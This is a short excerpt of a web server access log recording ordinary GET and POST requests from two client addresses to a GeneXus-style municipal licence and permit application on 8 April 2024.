181.212.43.89 - - [08/Apr/2024:11:06:49 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
181.212.43.89 - - [08/Apr/2024:11:06:49 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1712585006367 HTTP/1.1" 200 117
181.212.43.89 - - [08/Apr/2024:11:06:49 -0300] "GET /cormun/servlet/solicitudot?f98b687a2d54d9c9b1cda92d9b04022c5b1e2592125adc689285176725a4be86b9397e8a01671a32dc0ad66c678e8959d3f34d6370d4134343ae74fbd7347a4f89a08d888c618c7edd2a32de54ab95dca031dd00d14318dc56fdc2cefe5a2458a09d80401efaf8b410413e32922042bc,gx-no-cache=1712585006383 HTTP/1.1" 200 110
181.212.43.89 - - [08/Apr/2024:11:06:49 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1712585006401 HTTP/1.1" 200 64
181.212.43.89 - - [08/Apr/2024:11:06:49 -0300] "GET /cormun/servlet/solicitudot?f98b687a2d54d9c9b1cda92d9b04022c5938b3d3cd876e498460b735ce6ede9af4fec570da5d39999b4d4833ecf03d879e55953d240bb6287331aeb411723afe312edc68cc9ca9a2732cbcedbde2596b81dc617938faa097a77670749fd4acd8c45c1d3a678e7bdc556e51b5434468ba,gx-no-cache=1712585006420 HTTP/1.1" 200 29
181.212.43.89 - - [08/Apr/2024:11:06:49 -0300] "GET /cormun/servlet/solicitudot?f98b687a2d54d9c9b1cda92d9b04022cf82d9eefb4f3df0b80d54536dec59fcf849132525c99f97590ea3dd747b66f3f,gx-no-cache=1712585006434 HTTP/1.1" 200 30
190.171.153.26 - - [08/Apr/2024:11:06:51 -0300] "POST /cormun/servlet/trlicencias?978a9f29f5d842d6242e553d640ebb79,,gx-no-cache=1712585017803 HTTP/1.1" 200 6734
181.212.43.89 - - [08/Apr/2024:11:07:05 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1712585022341 HTTP/1.1" 200 1483
181.212.43.89 - - [08/Apr/2024:11:07:07 -0300] "GET /cormun/servlet/prlicenciaspermisos?12692373,L,,MD,,gxPopupLevel%3D0%3B HTTP/1.1" 200 5873
181.212.43.89 - - [08/Apr/2024:11:07:12 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1712585028971 HTTP/1.1" 200 41
